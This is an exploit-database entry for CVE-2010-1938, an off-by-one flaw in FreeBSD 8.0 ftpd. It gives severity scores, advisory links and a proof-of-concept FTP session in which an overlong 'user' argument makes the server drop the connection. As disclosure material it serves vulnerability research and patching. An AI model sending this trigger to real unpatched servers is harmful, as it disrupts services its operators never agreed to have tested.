FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)

2010-05-2700:00:00

Maksymilian Arciemowicz

www.exploit-db.com

9.5 High

AI Score

Confidence

High

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.869 High

EPSS

Percentile

98.6%

JSON

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://securityreason.com/achievement_securityalert/87
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#

PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

- -- 
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<[email protected]>
sub 4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg